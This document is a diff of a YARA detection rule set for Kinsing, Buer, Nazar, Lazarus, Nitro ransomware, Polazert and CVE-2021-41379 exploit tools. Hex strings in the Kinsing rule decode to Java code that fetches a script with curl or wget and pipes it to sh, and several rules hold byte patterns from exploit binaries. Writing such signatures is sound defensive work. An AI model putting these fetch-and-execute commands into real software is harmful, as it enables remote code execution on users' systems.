+		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
+		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
+		$ClassCode3 = "java/net/URL" fullword ascii
+		$ClassCode4 = "java/net/URLConnection" fullword ascii
+		$ClassCode5 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
+		$Com1 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 63 75 72 6C 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
+		$Com2 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 77 67 65 74 20 2D 71 20 2D 4F 20 2D 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
+		$Com3 = "chmod +x " fullword ascii
+		$Com4 = { 53 4b 4c 01 00 02 6c 66 }
+		$s1 = "User-Agent" fullword ascii
+		$s2 = "kinsing" fullword ascii
+		$s3 = { 6f 73 2e 6e 61 6d 65 }
+		$s4 = "getAbsolutePath" fullword ascii
+		$s5 = { 6f 70 65 6e 43 6f 6e 6e 65 63 74 69 6f 6e }
+
+	condition:
+		filesize < 1KB and 4 of ( $ClassCode* ) and 3 of ( $Com* ) and 3 of ( $s* )
+}
+rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_B_1 : FILE
+{
+	meta:
+		description = "Detect Kinsing Variant B"
+		author = "Arkbird_SOLG"
+		id = "7e0f9826-806c-5801-aab5-d2a8dba4e206"
+		date = "2020-08-28"
+		modified = "2020-08-29"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L32-L52"
+		license_url = "N/A"
+		logic_hash = "5862d02b4e57024aa1c00b0a10ac9ee1a733890cf7d5b9ec7586f0506af113fc"
 		score = 75
 		quality = 75
-		tags = "CVE-2021-41379, FILE"
-		hash1 = "13fe508e7efb50378eb8e0225221283756bf482d51be7837f850ef2b7f3281f0"
-		hash2 = "402722d95d468ddef049e1079c882bb9a316841b9695a15783fc23bbd3b33aed"
-		hash3 = "d025564e6dc872cff32f2295e0b5a2d8e3a21fbef1957facb69a493fa8a995fb"
-		hash4 = "dc65cd6311fd764a89d0761932bef61a89fd979510bd9ff23cde8c001de316b8"
-		tlp = "white"
-		adversary = "-"
+		tags = "FILE"
+		hash1 = "e1471e8f9c1aa1457f819c0565a3444c53d3ec5fadf9f52ae988fde8e2d3a960"
+		hash2 = "e70ea87d00567d33e20ed8649ef532eda966a8b5b1e83ea19728528d991eaaa0"
 
 	strings:
-		$s1 = { 4c 89 6c 24 38 44 89 6c 24 30 44 89 6c 24 28 44 89 6c 24 20 [1-2] 01 00 00 00 ?? 8b ?? 45 33 c0 ba 03 00 08 00 48 8d 0d [3] 00 ff 15 [3] 00 48 8b d8 48 83 f8 ff 0f 84 ?? 01 00 00 33 d2 48 8b c8 ff 15 [3] 00 44 89 6d 10 48 8d 55 10 48 8b cb ff 15 [3] 00 48 8b cb ff 15 [3] 00 ff 15 [3] 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [3] 00 48 8b d8 4c 89 }
-		$s2 = { 4c 89 6c 24 30 c7 44 24 28 80 00 00 04 c7 44 24 20 04 00 00 00 45 33 c9 [1-2] 01 00 00 00 ?? 8b ?? ba 00 00 01 80 48 8d 4d 20 ff 15 [3] 00 48 89 05 [3] 00 44 89 6d 14 48 8d 45 14 48 89 44 24 28 44 89 6c 24 20 45 33 c9 4c 8d 05 [2] ff ff 33 d2 33 c9 ff 15 [3] 00 48 8b d8 ?? 8b ?? ba 04 01 00 00 49 8d ?? 10 02 00 00 [4] 00 }
-		$s3 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 [3] 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 [3] 00 48 8b d9 33 d2 0f 10 0d [3] 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 [3] 00 0f 29 4c 24 30 0f 29 44 24 40 e8 [2] 00 00 4c 8b 0b 48 8d 44 24 20 41 b8 00 04 00 00 41 8b c8 66 83 38 00 74 0a 48 83 c0 02 48 83 e9 01 75 f0 45 33 d2 49 8b c0 48 2b c1 48 85 c9 49 0f 44 c2 74 47 4c 2b c0 48 8d 44 44 20 74 2e b9 fe ff ff 7f 4c 2b c8 0f 1f 80 00 00 00 00 48 85 c9 74 1a 41 0f b7 14 01 66 85 d2 74 10 66 89 10 48 ff c9 48 83 c0 02 49 83 e8 01 75 e1 4d 85 c0 48 8d 50 fe 48 0f 45 d0 66 44 89 12 33 d2 8d 4a 02 ff 15 [3] 00 48 8b 4b 08 48 8d 54 24 20 ff 15 [3] 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 [2] 00 00 48 81 c4 30 08 00 00 5b }
-		$s4 = { 48 8b c8 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8b c8 41 b8 04 01 00 00 48 8d 95 30 02 00 00 ff 15 [3] 00 e8 [2] ff ff 48 8b d0 45 33 c0 48 8d 8d 30 02 00 00 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8d }
+		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
+		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
+		$ClassCode3 = "java/net/URL" fullword ascii
+		$ClassCode4 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
+		$Com1 = "chmod +x " fullword ascii
+		$Com2 = { 53 4b 4c 01 00 02 6c 66 }
+		$s1 = "kinsing" fullword ascii
+		$s2 = "getAbsolutePath" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		filesize < 1KB and 3 of ( $ClassCode* ) and 1 of ( $Com* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_1 : CVE_2021_41379 FILE
+rule ARKBIRD_SOLG_Loader_Buer_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect exploit tool using CVE-2021-41379"
+		description = "Detect Buer loader"
 		author = "Arkbird_SOLG"
-		id = "616e697d-0c62-58bb-9f37-29670a09d886"
-		date = "2021-11-26"
-		modified = "2021-11-29"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1463414554004709384"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_1.yara#L1-L21"
+		id = "a2883eca-d576-53ba-aa97-5e3c94f501a5"
+		date = "2020-12-01"
+		modified = "2020-12-01"
+		reference = "https://twitter.com/James_inthe_box/status/1333551419735953409"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-01/Buer/Mal_Buer_Nov_2020_1.yar#L35-L64"
 		license_url = "N/A"
-		logic_hash = "5514ab8f95a5d82453407dd506d55eaf1a0aa22f5ce6a5fb18501ef41645305a"
+		logic_hash = "96a74b497076be170ce6138189501d8b3a1002bcf07f9d3cf662d64612d04a59"
+		score = 75
+		quality = 55
+		tags = "FILE"
+		hash1 = "2824d4b0e5a502416696b189bd840870a19dfd555b53535f20b0c87c95f4c232"
+		hash2 = "a98abbce5e84c4c3b67b7af3f9b4dc9704b5af33b6183fb3c192e26b1e0ca005"
+		hash3 = "ae3ac27e8303519cf04a053a424a0939ecc3905a9a62f33bae3a29f069251b1f"
+
+	strings:
+		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
+		$s2 = "%02x" fullword wide
+		$s3 = "{%s-%d-%d}" fullword wide
+		$s4 = "update" fullword wide
+		$s5 = "]otju}y&Ykx|kx&867?5Ykx|kx&867<" fullword ascii
+		$s6 = "]otju}y&Ykx|kx&8678&X8" fullword ascii
+		$s7 = "]otju}y&\\oyzg5Ykx|kx&857>" fullword ascii
+		$s8 = "]otju}y&>47" fullword ascii
+		$s9 = "]otju}y&Ykx|kx&8678" fullword ascii
+		$s10 = "]otju}y&=" fullword ascii
+		$s11 = "Iutzktz3Z" fullword ascii
+		$s12 = "g|mnuuq~4jrr" fullword ascii
+		$s13 = "RegularModules" fullword ascii
+		$s14 = "]otju}y&>" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 8 of them
+}
+rule ARKBIRD_SOLG_Backdoor_APT_Nazar_April_2020_1 : FILE
+{
+	meta:
+		description = "Detect strings used by APT Nazar"
+		author = "Arkbird_SOLG"
+		id = "727a1f4e-1371-5a95-bce9-4a4f701a2ac6"
+		date = "2020-04-29"
+		modified = "2023-11-22"
+		reference = "Internal research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-04-29/Yara_Rule_APT_Bazar-April_2020_1.yar#L3-L29"
+		license_url = "N/A"
+		logic_hash = "79028588ac6afd3e3d0d839d10eada9e5382991eebb600b0dae2119bcd7eac93"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
+
+	strings:
+		$s1 = "101;0000;" fullword ascii
+		$s2 = "hodll.dll" fullword ascii
+		$s3 = { 70 73 73 64 6B ?? ?? 2E 73 79 73 }
+		$s4 = { 70 73 73 64 6B ?? ?? 2E 76 78 64 }
+		$s5 = "##$$%%&&''(())**++,,--..//0123456789:;<=>?" fullword ascii
+		$s6 = "SYSTEM\\CurrentControlSet\\Services\\VxD\\MSTCP" fullword ascii
+		$s7 = "removehook" fullword ascii
+		$s8 = "installhook" fullword ascii
+		$s9 = "_crt_debugger_hook" fullword ascii
+		$s10 = "\\Files.txt" fullword ascii
+		$s11 = "\\report.txt" fullword ascii
+		$s12 = "\\Programs.txt" fullword ascii
+		$s13 = "\\Devices.txt" fullword ascii
+		$s14 = "\\music.mp3" fullword ascii
+		$s15 = "\\z.png" fullword ascii
+
+	condition:
+		12 of them and filesize > 120KB
+}
+
+rule ARKBIRD_SOLG_APT_Lazarus_Stealer_Packed_July_2020_1 : FILE
+{
+	meta:
+		description = "Detected Lazarus Strealer Packed by Thermida - July 2020"
+		author = "Arkbird_SOLG"
+		id = "325039a4-34c7-5144-93c0-61b013e30606"
+		date = "2020-07-23"
+		modified = "2023-11-22"
+		reference = "https://twitter.com/DeadlyLynn/status/1286233135751995397"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-23/Yara_Rule_APT_Lazarus_Stealer_July_2020_1.yar#L36-L66"
+		license_url = "N/A"
+		logic_hash = "f062c8f784133ad586490036757ff9d5e8a799e8abac94eeacf60743783e19ed"
+		score = 75
+		quality = 50
+		tags = "FILE"
+		hash1 = "431e6784ef33f2b3963464458e73915875947b11348533544cc16c53af64740f"
+		hash2 = "70f45a7bbddda140695b953254650486733d8039c63e4eaeb454c1189a97989b"
+
+	strings:
+		$s1 = "fill_win32_filefunc64" fullword ascii
+		$s2 = "gzfread" fullword ascii
+		$s3 = "deflateGetDictionary" fullword ascii
+		$s4 = "gzfwrite" fullword ascii
+		$s5 = "adler32_z" fullword ascii
+		$s6 = "@AJ<LxwBMDNCIFE}#SRV" fullword ascii
+		$s7 = "uncompress2" fullword ascii
+		$s8 = "zxyakauj" fullword ascii
+		$s9 = "gzfwrite" fullword ascii
+		$s10 = "tphfpzvy" fullword ascii
+		$s11 = "Dn.dll" fullword ascii
+		$s12 = ":USER32.8dl" fullword ascii
+		$s13 = "zlib data compression and ZIP file I/O library" fullword wide
+		$s14 = "Dn64.dll" fullword ascii
+		$s15 = "zlibwapi.dll" fullword ascii
+		$s16 = "CTRL+_" fullword ascii
+		$s17 = "ZLib.DLL" fullword ascii
+		$s18 = "(C) 1995-2017 Jean-loup Gailly & Mark Adler-" fullword ascii
+		$s19 = "zlib data compression and ZIP file I/O library" fullword ascii
+		$s20 = "DLL support by Alessandro Iacopetti & Gilles Vollant" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and pe.exports ( "BZ2_bzInit" ) and pe.exports ( "BZ2_bzZip" ) and pe.exports ( "BZ2_bzZipW" ) and pe.exports ( "adler32_z" ) and pe.exports ( "crc32_z" ) and pe.exports ( "deflateGetDictionary" ) and 15 of them
+}
+rule ARKBIRD_SOLG_RAN_Nitro_Aug_2021_1 : FILE
+{
+	meta:
+		description = "Detect Nitro ransomware"
+		author = "Arkbird_SOLG"
+		id = "256059b2-1683-5108-8fc8-3cf0b2e7b613"
+		date = "2021-08-12"
+		modified = "2021-08-13"
+		reference = "https://bazaar.abuse.ch/browse/tag/NitroRansomware/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-13/Nitro/RAN_Nitro_Aug_2021_1.yara#L1-L23"
+		license_url = "N/A"
+		logic_hash = "c31267cd9bc6c63db8e32b2a0e7518b0432d62f1de52117b9e903fc3370a1f4d"
 		score = 75
 		quality = 75
-		tags = "CVE-2021-41379, FILE"
-		hash1 = "5d97d3035b2ec1bd16016922899350693cae5f7a3be6cadbe0da34fbfd14b612"
-		hash2 = "76fe99189fa84e28dd346b1105da77c4dfd3f7f16478b05bfca4c13a75d9fd07"
-		hash3 = "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd"
-		hash4 = "a018545b334dc2a0e0c437789a339c608852fa1cedcc88be9713806b0855faea"
+		tags = "FILE"
+		hash1 = "1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13"
+		hash2 = "6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf"
+		hash3 = "89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559"
+		hash4 = "d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0"
+		hash5 = "dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b"
 		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 50 6a 01 50 68 03 00 08 00 68 [3] 00 ff 15 [3] 00 8b f0 83 fe ff 0f 84 [2] 00 00 6a 00 56 ff 15 88 [2] 00 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 56 ff 15 [3] 00 8b 3d [3] 00 56 ff d7 ff 15 [3] 00 50 6a 00 68 00 10 10 00 ff 15 [3] 00 8b f0 c7 85 ?? fb ff ff 00 00 00 00 8d 85 ?? fb ff ff 50 68 ff 01 0f 00 56 ff 15 [3] 00 56 ff d7 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 6a 04 8d 85 ?? fb ff ff 50 6a 0c ff b5 ?? fb ff ff ff 15 08 [2] 00 6a 44 8d 85 78 fb ff ff 0f 57 c0 6a 00 50 0f 11 85 bc fb ff ff e8 [2] 00 00 83 c4 0c c7 85 78 fb ff ff 44 00 00 00 b8 05 00 00 00 c7 85 80 fb ff ff [3] 00 66 89 85 a8 fb ff ff 8d 85 e8 fd ff ff 68 04 01 00 00 50 68 [3] 00 ff 15 [3] 00 8d 85 bc fb ff ff 50 8d 85 78 fb ff ff 50 6a 00 6a 00 6a 10 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 ff b5 bc fb ff ff ff d7 ff b5 c0 fb ff ff ff d7 }
-		$s2 = { 6a 00 68 80 00 00 04 6a 04 6a 00 6a 01 68 00 00 01 80 8d 85 e8 fd ff ff 50 ff 15 [3] 00 8b 35 [3] 00 a3 [3] 00 8d 85 d8 fb ff ff 50 6a 00 6a 00 68 [2] 40 00 6a 00 6a 00 c7 85 d8 fb ff ff 00 00 00 00 ff d6 8b f8 8b 85 dc fb ff ff 68 [3] 00 05 0c 02 00 00 68 04 01 00 00 50 }
-		$s3 = { 55 8b ec 81 ec 04 08 00 00 a1 04 [2] 00 33 c5 89 45 fc 0f 10 05 [3] 00 ?? 8b ?? 08 8d 85 2c f8 ff ff [0-1] 0f 11 85 fc f7 ff ff [1-5] 0f 10 05 [3] 00 [3-8] 0f 11 85 0c f8 ff ff [0-1] 0f 10 05 }
-		$s4 = { 50 ff ?? 68 04 01 00 00 8d 85 e0 fb ff ff 50 6a 00 ff 15 [3] 00 50 ff 15 [3] 00 6a 00 e8 [2] ff ff 50 8d 85 e0 fb ff ff 50 ff 15 84 [2] 00 6a 00 ff 15 [3] 00 8d 85 ?? fb ff ff 50 68 [3] 00 6a 04 6a 00 68 [3] 00 ff 15 [3] 00 ff 15 [3] 00 8b 35 [3] 00 8b 3d [3] 00 }
+		$s1 = { 1f 1a 28 ?? 00 00 0a [0-2] 72 ?? 14 00 70 28 15 00 00 0a 80 32 00 00 04 28 ?? 00 00 06 7e 32 00 00 04 6f ?? 00 00 0a [0-1] 7e 2f 00 00 04 16 7e 32 00 00 04 7e 30 00 00 04 7e 31 00 00 04 60 28 ?? 00 00 06 26 2a }
+		$s2 = { 02 [0-5] 72 df 00 00 70 28 1b 00 00 }
+		$s3 = { 1f 1a 28 ?? 00 00 0a 0a 1f 1c 28 ?? 00 00 0a 0b 7e 21 00 00 04 06 72 ?? 0c 00 70 28 15 00 00 0a 6f 16 00 00 0a [2] ?? 00 }
+		$s4 = { 7e 4e 00 00 0a 0a [0-1] 72 [2] 00 70 73 ?? 00 00 06 0b [0-1] 07 72 [2] 00 70 6f ?? 00 00 06 [1-3] 8d 7f 00 00 01 25 16 1f 0a 9d 6f ?? 00 00 0a 1c 9a 0a [0-1] de ?? 07 2c ?? 07 6f 42 00 00 0a }
+		$s5 = { 7e 4e 00 00 0a 0a [0-1] 73 ?? 00 00 0a 0b [0-1] 07 72 ?? 14 00 70 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 0a }
 
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_3 : CVE_2021_41379 FILE
+rule ARKBIRD_SOLG_MAL_Polazert_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect exploit tool using CVE-2021-41379 (variant 3)"
+		description = "Detect Polazert stealer"
 		author = "Arkbird_SOLG"
-		id = "c82578d6-63ca-50f6-b105-321791ec8808"
-		date = "2021-11-26"
-		modified = "2021-11-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_3.yara#L1-L27"
+		id = "c7766749-558f-50b8-9054-01f5c4e1238b"
+		date = "2021-04-11"
+		modified = "2021-04-11"
+		reference = "https://bazaar.abuse.ch/browse/tag/Polazert/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-11/Polazert/MAL_Polazert_Apr_2021_1.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "559c4ca0e9ac60e3dd7d5b9a8eb22d887b0b436d4e1fc528e05e7a33ecce0aa6"
+		logic_hash = "29cefeb3816435e70c706ac78395738f075f6c9f81d63e7295b0d8a6f370b51d"
 		score = 75
 		quality = 75
-		tags = "CVE-2021-41379, FILE"
-		hash1 = "0dcda614c0128813bf74802f0e98ffd5ec32a40f35ed42778a5ec5984b5adf47"
-		hash2 = "3c78e07924e1503be1f8785c23d0dd813f04211992cbd6a4955cd0e25c745735"
-		hash3 = "57ec6e15bcc9c79c118f97103815bd74226d4baae334142890a52fbbc5006f1b"
-		hash4 = "9d24383e50e61257c565e47ec073cbb2cd751b6f650f0d542b0643dbe6691b3c"
-		tlp = "white"
-		adversary = "-"
+		tags = "FILE"
 
 	strings:
-		$s1 = { 8d 0d [2] 03 00 e8 [2] ff ff 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 ff 15 [2] 03 00 3d 24 }
-		$s2 = { 33 d2 48 8b 4d 08 ff 15 [2] 03 00 c7 45 24 00 00 00 00 48 8d 55 24 48 8b 4d 08 ff 15 [2] 03 00 48 8b 4d 08 ff 15 [2] 03 00 ff 15 [2] 03 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [2] 03 00 48 89 45 48 48 c7 45 68 00 00 00 00 4c 8d 45 68 ba ff 01 0f 00 48 8b 4d 48 ff 15 [2] 03 00 48 8b 4d 48 ff 15 [2] 03 00 48 c7 85 88 00 00 00 00 00 00 00 48 8d 85 88 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 41 b9 02 00 00 00 45 33 c0 ba ff 01 0f 00 48 8b 4d 68 ff 15 [2] 03 00 48 8b 4d 68 ff 15 [2] 03 00 41 b9 04 00 00 00 4c 8d 45 24 ba 0c 00 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 8b f8 33 c0 b9 18 00 00 00 f3 aa 48 8d 85 e0 00 00 00 48 8b f8 33 c0 b9 68 00 00 00 f3 aa c7 85 e0 00 00 00 68 00 00 00 b8 05 00 00 00 66 89 85 20 01 00 00 48 8d 05 [2] 02 00 48 89 85 f0 00 00 00 41 b8 04 01 00 00 48 8d 95 70 01 00 00 48 8d 0d [2] 02 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 89 44 24 50 48 8d 85 e0 00 00 00 48 89 44 24 48 48 c7 44 24 40 00 00 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 10 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 48 8d 95 70 01 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d a8 00 00 00 ff 15 [2] 03 00 48 8b 8d b0 00 00 00 ff 15 [2] 03 00 }
-		$s3 = { 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 48 8b 4d 08 ff 15 [2] 03 00 48 c7 45 48 00 00 00 00 c7 45 64 00 00 00 00 4c 8d 4d 64 45 33 c0 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 8b 45 64 48 89 85 88 04 00 00 ff 15 [2] 03 00 48 8b 8d 88 04 00 00 4c 8b c1 ba 0c 00 00 00 48 8b c8 ff 15 [2] 03 00 48 89 45 48 4c 8d 4d 64 44 8b 45 64 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 48 8b 45 48 4c 8b 40 10 ba 04 01 00 00 48 8d 8d 90 00 00 00 ff 15 [2] 03 00 ff 15 [2] 03 00 4c 8b 45 48 33 d2 48 8b c8 ff 15 [2] 03 00 48 8b 4d 28 ff 15 [2] 03 00 c7 85 b4 02 00 00 01 00 00 00 c7 85 d4 02 00 00 00 00 00 }
-		$s4 = { 68 00 00 00 80 6a 00 6a 00 ff 15 24 f0 43 00 3b f4 e8 bf 5b ff ff 89 45 f8 8b f4 6a 01 68 34 84 43 00 8b 45 f8 50 ff 15 20 f0 43 00 3b f4 e8 a2 5b ff ff 89 45 ec 8b f4 ff 15 2c f1 43 00 3b f4 e8 90 5b ff ff 3d 24 }
-		$s5 = { f3 ab a1 0c d0 43 00 33 c5 89 45 fc b9 d9 10 44 00 e8 55 9c ff ff 8b 45 08 89 45 f4 b9 0c 00 00 00 be a4 7e 43 00 8d bd ec f7 ff ff f3 a5 68 d0 07 00 00 6a 00 8d 85 1c f8 ff ff 50 e8 bd 95 ff }
-		$s6 = { 8b f4 6a 00 8b 45 f4 50 ff 15 88 f0 43 00 3b f4 e8 8d 67 ff ff c7 45 e8 00 00 00 00 8b f4 8d 45 e8 50 8b 4d f4 51 ff 15 c8 f0 43 00 3b f4 e8 6f 67 ff ff 8b f4 8b 45 f4 50 ff 15 30 f1 43 00 3b f4 e8 5c 67 ff ff 8b f4 ff 15 a4 f0 43 00 3b f4 e8 4d 67 ff ff 8b f4 50 6a 00 68 00 10 10 00 ff 15 b8 f0 43 00 3b f4 e8 36 67 ff ff 89 45 dc c7 45 d0 00 00 00 00 8b f4 8d 45 d0 50 68 ff 01 0f 00 8b 4d dc 51 ff 15 3c f0 43 00 3b f4 e8 10 67 ff ff 8b f4 8b 45 dc 50 ff 15 30 f1 43 00 3b f4 e8 fd 66 ff ff c7 45 c4 00 00 00 00 8b f4 8d 45 c4 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 8b 4d d0 51 ff 15 38 f0 43 00 3b f4 e8 d4 66 ff ff 8b f4 8b 45 d0 50 ff 15 30 f1 43 00 3b f4 e8 c1 66 ff ff 8b f4 6a 04 8d 45 e8 50 6a 0c 8b 4d c4 51 ff 15 2c f0 43 00 3b f4 e8 a6 66 ff ff 33 c0 89 45 ac 89 45 b0 89 45 b4 89 45 b8 6a 44 6a 00 8d 85 60 ff ff ff 50 e8 36 63 ff ff 83 c4 0c c7 85 60 ff ff ff 44 00 00 00 b8 05 00 00 00 66 89 45 90 c7 85 68 ff ff ff a0 86 43 00 8b f4 68 04 01 00 00 8d 85 50 fd ff ff 50 68 c8 86 43 00 ff 15 58 f1 43 00 3b f4 e8 48 66 ff ff 8b f4 8d 45 ac 50 8d 8d }
-		$s7 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 b8 78 00 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 7e 4e 00 00 48 8b d9 33 d2 0f 10 0d 82 4e 00 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 7b 4e 00 00 0f 29 4c 24 30 0f 29 44 24 40 e8 da 42 00 00 4c 8b 03 48 8d 4c 24 20 ba 00 04 00 00 e8 6a f8 ff ff 33 d2 8d 4a 02 ff 15 77 4c 00 00 48 8b 4b 08 48 8d 54 24 20 ff 15 70 4c 00 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 de 34 00 00 48 81 c4 30 08 00 00 }
-		$s8 = { 33 d2 48 8b cb ff 15 c6 2c 00 00 83 65 00 00 48 8d 55 00 48 8b cb ff 15 85 2c 00 00 48 8b cb ff 15 1c 2d 00 00 ff 15 86 2c 00 00 33 d2 b9 00 10 10 00 44 8b c0 ff 15 46 2c 00 00 48 83 64 24 68 00 4c 8d 44 24 68 48 8b c8 ba ff 01 0f 00 48 8b d8 ff 15 82 2b 00 00 48 8b cb ff 15 e1 2c 00 00 48 8b 4c 24 68 48 8d 44 24 60 48 83 64 24 60 00 41 b9 02 00 00 00 48 89 44 24 28 45 33 c0 ba ff 01 0f 00 c7 44 24 20 01 00 00 00 ff 15 80 2b 00 00 48 8b 4c 24 68 ff 15 a5 2c 00 00 48 8b 4c 24 60 4c 8d 45 00 41 b9 04 00 00 00 41 8d 51 08 ff 15 1c 2b 00 00 33 c0 48 8d 4d 90 0f 57 c0 48 89 45 80 33 d2 0f 11 44 24 70 8d 58 68 44 8b c3 e8 5b 25 00 00 8d 43 9d 89 5d 90 66 89 45 d0 48 8d 55 10 48 8d 05 e0 33 00 00 41 b8 04 01 00 00 48 8d 0d f3 33 00 00 48 89 45 a0 ff 15 91 2c 00 00 48 8b 4c 24 60 48 8d 44 24 70 48 89 44 24 50 48 8d 55 10 48 8d 45 90 45 33 c9 48 89 44 24 48 45 33 c0 48 83 64 24 40 00 48 83 64 24 38 00 c7 44 24 30 10 00 00 00 83 64 24 28 00 48 83 64 24 20 00 ff 15 9a 2a 00 00 48 8b 4c 24 60 ff 15 ef 2b 00 00 48 8b 4c 24 70 ff 15 e4 2b 00 00 48 8b 4c 24 78 ff 15 d9 }
